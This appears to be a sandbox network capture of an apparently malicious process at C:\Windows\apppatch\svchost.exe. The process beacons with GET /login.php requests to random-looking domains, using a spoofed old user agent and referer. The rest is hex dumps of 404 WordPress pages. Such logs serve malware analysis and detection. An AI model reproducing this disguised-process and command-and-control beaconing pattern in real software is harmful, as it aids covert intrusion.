                                                                                                                                                                                                            2024-09-08 06:59:30 UTC1369INData Raw: 6d 6a 73 22 20 74 79 70 65 3d 22 6d 6f 64 75 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 6e 6f 6d 6f 64 75 6c 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 76 30 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 76 30 2f 61 6d 70 2d 62 69 6e 64 2d 30 2e 31 2e 6d 6a 73 22 20 61 73 79 6e 63 3d 22 22 20 63 75 73 74 6f 6d 2d 65 6c 65 6d 65 6e 74 3d 22 61 6d 70 2d 62 69 6e 64 22 20 74 79 70 65 3d 22 6d 6f 64 75 6c 65
                                                                                                                                                                                                            Data Ascii: mjs" type="module" crossorigin="anonymous"></script><script async nomodule src="https://cdn.ampproject.org/v0.js" crossorigin="anonymous"></script><script src="https://cdn.ampproject.org/v0/amp-bind-0.1.mjs" async="" custom-element="amp-bind" type="module


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.455363188.114.96.34437524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-09-08 06:59:31 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-09-08 06:59:32 UTC902INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 06:59:32 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            server-timing: amp_sanitizer;dur="61.2",amp_style_sanitizer;dur="27.2",amp_tag_and_attribute_sanitizer;dur="23.1",amp_optimizer;dur="8.5"
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j2xp2Lim%2F7gWUSjjI34R0T7KDe04gNt1BGkt21KYSyFIUP%2BKzR7uzm1DY08ixbVqhQm0HECsZoxlYj7VHPPPN93vcaQEQSXGX7Nr9UvnUTH%2FQCcNum6L%2FxXsN%2BQh9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0e6cbf60437a-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            2024-09-08 06:59:32 UTC467INData Raw: 37 63 32 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                            Data Ascii: 7c2b<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                            2024-09-08 06:59:32 UTC1369INData Raw: 33 34 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 2c 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 68 65 69 67 68 74 3a 61 75 74 6f 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 3a 6e 6f 74 28 5b 61 6d 70 34 61 64 73 5d 29 20 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 7b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 6f 7a 2d 74 65
                                                                                                                                                                                                            Data Ascii: 34000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:100%!important;width:100%!important}html:not([amp4ads]),html:not([amp4ads]) body{height:auto!important}html:not([amp4ads]) body{margin:0!important}body{-webkit-text-size-adjust:100%;-moz-te
                                                                                                                                                                                                            2024-09-08 06:59:32 UTC1369INData Raw: 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 64 69 73 61 62 6c 65 64 7b 6f 76 65 72 66 6c 6f
                                                                                                                                                                                                            Data Ascii: phtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{visibility:hidden}#i-amphtml-wrapper+body[i-amphtml-lightbox] .i-amphtml-lightbox-element{visibility:visible}#i-amphtml-wrapper.i-amphtml-scroll-disabled,.i-amphtml-scroll-disabled{overflo
                                                                                                                                                                                                            2024-09-08 06:59:32 UTC1369INData Raw: 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 3a 6e 6f 74 28 5b 64 69 73 74 61 6e 63 65 5d 29 3a 6e 6f 74 28 5b 61 63 74 69 76 65 5d 29 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 31 30 30 30 76 68 29 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3e 69 6e 70 75 74 2c 61 6d 70 2d 61 75 74 6f 63 6f 6d 70 6c 65 74
                                                                                                                                                                                                            Data Ascii: er-background{display:none!important}amp-story-page:not(:first-of-type):not([distance]):not([active]){transform:translateY(1000vh)!important}amp-autocomplete{position:relative!important;display:inline-block!important}amp-autocomplete>input,amp-autocomplet
                                                                                                                                                                                                            2024-09-08 06:59:32 UTC1369INData Raw: 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 69 6e 74 72 69 6e 73 69 63 2d 73 69 7a 65 72 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 2c 2e 69 2d 61
                                                                                                                                                                                                            Data Ascii: ][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;position:relative;max-width:100%}.i-amphtml-layout-intrinsic .i-amphtml-sizer{max-width:100%}.i-amphtml-intrinsic-sizer{max-width:100%;display:block!important}.i-amphtml-layout-container,.i-a
                                                                                                                                                                                                            2024-09-08 06:59:32 UTC1369INData Raw: 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 72 69 67 68 74 3a 30 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 72 65 70 6c 61 63 65 64 2d 63 6f 6e 74 65 6e 74 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 61 64 64 69 6e 67 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 65 65 6e 2d 72 65 61 64 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 74 6f 70 3a 30 70 78 21 69 6d 70 6f 72 74 61 6e 74
                                                                                                                                                                                                            Data Ascii: -layout-size-defined .i-amphtml-fill-content{position:absolute;top:0;left:0;bottom:0;right:0}.i-amphtml-replaced-content,.i-amphtml-screen-reader{padding:0!important;border:none!important}.i-amphtml-screen-reader{position:fixed!important;top:0px!important
                                                                                                                                                                                                            2024-09-08 06:59:32 UTC1369INData Raw: 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3e 69 6d 67 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 2c 5b 77 69 64 74 68 5d 5b 68
                                                                                                                                                                                                            Data Ascii: layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-amphtml-element)[i-amphtml-ssr]>img.i-amphtml-fill-content{display:block}.i-amphtml-notbuilt:not(.i-amphtml-layout-container),[layout]:not([layout=container]):not(.i-amphtml-element),[width][h
                                                                                                                                                                                                            2024-09-08 06:59:32 UTC1369INData Raw: 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 61 74 74 72 28 65 72 72 6f 72 2d 6d 65 73 73 61 67 65 29 7d 69 2d 61 6d 70 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 2c 69 2d 61 6d 70 68 74 6d 6c 2d 73 63 72 6f 6c 6c 2d 63 6f 6e 74 61 69 6e 65 72 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70
                                                                                                                                                                                                            Data Ascii: y{display:none!important}.i-amphtml-element-error{background:red!important;color:#fff!important;position:relative!important}.i-amphtml-element-error:before{content:attr(error-message)}i-amp-scroll-container,i-amphtml-scroll-container{position:absolute;top
                                                                                                                                                                                                            2024-09-08 06:59:32 UTC1369INData Raw: 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 70 78 29 7b 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e 3e 73 65 63 74 69 6f 6e 29 3e 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 66 65 66 65 66 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 66 64 66 64 66 7d 3a 77 68 65 72 65 28 61 6d 70 2d 61 63 63 6f 72 64 69
                                                                                                                                                                                                            Data Ascii: ],form [submit-success],form [submitting]{display:none}amp-accordion{display:block!important}@media (min-width:1px){:where(amp-accordion>section)>:first-child{margin:0;background-color:#efefef;padding-right:20px;border:1px solid #dfdfdf}:where(amp-accordi


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            4192.168.2.454050188.114.96.34437524C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-09-08 07:00:13 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            2024-09-08 07:00:14 UTC775INHTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Sun, 08 Sep 2024 07:00:13 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oKMOtInikg0%2FmNHHQjSa49%2BaG%2B%2FWmcxlBrd%2FJK%2FqI3MUNWI4xIZAyqv5YWv%2F%2Bi8RZ9Wao8W%2FOqX682yXHh7lHwBL6c%2FTE2PmEaf98c3U9%2FcqO2xUfPVnSakNVM9trg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8bfd0f6ecafd19bf-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            2024-09-08 07:00:14 UTC594INData Raw: 37 63 61 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                            Data Ascii: 7caa<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                            2024-09-08 07:00:14 UTC1369INData Raw: 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69
                                                                                                                                                                                                            Data Ascii: ge not found -</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@i
                                                                                                                                                                                                            2024-09-08 07:00:14 UTC1369INData Raw: 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65
                                                                                                                                                                                                            Data Ascii: nvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));re
                                                                                                                                                                                                            2024-09-08 07:00:14 UTC1369INData Raw: 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54
                                                                                                                                                                                                            Data Ascii: Loaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportT
                                                                                                                                                                                                            2024-09-08 07:00:14 UTC1369INData Raw: 2d 63 73 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 33 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61
                                                                                                                                                                                                            Data Ascii: -css-css' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-conta
                                                                                                                                                                                                            2024-09-08 07:00:14 UTC1369INData Raw: 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c
                                                                                                                                                                                                            Data Ascii: :600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;l
